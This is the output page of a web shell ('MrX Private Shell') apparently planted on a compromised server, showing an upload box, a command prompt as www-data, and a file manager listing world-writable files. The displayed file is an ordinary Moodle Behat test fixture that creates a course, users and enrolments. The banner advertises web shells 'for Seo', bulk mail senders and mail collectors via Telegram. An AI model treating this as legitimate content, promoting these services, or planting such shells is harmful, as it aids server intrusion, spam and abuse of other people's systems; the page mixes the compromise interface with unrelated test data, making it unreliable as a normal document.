__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
Feature: Fixture to prepare scenario for testing
  Scenario: Create course content
    Given the following config values are set as admin:
      | sendcoursewelcomemessage | 0 | enrol_manual |
    And the following "course" exists:
      | fullname         | Course test |
      | shortname        | C1          |
      | category         | 0           |
      | numsections      | 3           |
      | initsections     | 1           |
    And the following "activities" exist:
      | activity | name              | intro                       | course   | idnumber | section | visible |
      | assign   | Activity sample 1 | Test assignment description | C1       | sample1  | 1       | 1       |
      | assign   | Activity sample 2 | Test assignment description | C1       | sample2  | 1       | 0       |

  @cleanup
  Scenario: clean course from fixture to prepare scenario for testing
    Given the course "Course test" is deleted

  Scenario: Create users
    Given the following "users" exist:
      | username      | firstname  | lastname | email              |
      | teachersample | Teacher    | Test1    | sample@example.com |
    And the following "course enrolments" exist:
      | user     | course   | role           |
      | teachersample | C1       | editingteacher |
    And "5" "users" exist with the following data:
      | username  | studentsample[count]             |
      | firstname | Student                          |
      | lastname  | Test[count]                      |
      | email     | studentsample[count]@example.com |
    And "5" "course enrolments" exist with the following data:
      | user   | studentsample[count] |
      | course | C1                   |
      | role   | student              |

  @cleanup
  Scenario: clean users from fixture to prepare scenario for testing
    Given the user "teachersample" is deleted
    And the user "studentsample1" is deleted
    And the user "studentsample2" is deleted
    And the user "studentsample3" is deleted
    And the user "studentsample4" is deleted
    And the user "studentsample5" is deleted

Filemanager

Name Type Size Permission Actions
scenario.feature File 2.05 KB 0777
scenario_cleanup.feature File 981 B 0777
scenario_outline.feature File 665 B 0777
scenario_plugins.feature File 511 B 0777
scenario_wrongempty.feature File 108 B 0777
scenario_wrongformat.feature File 102 B 0777
scenario_wrongonlybackground.feature File 653 B 0777
scenario_wrongstep.feature File 699 B 0777
Filemanager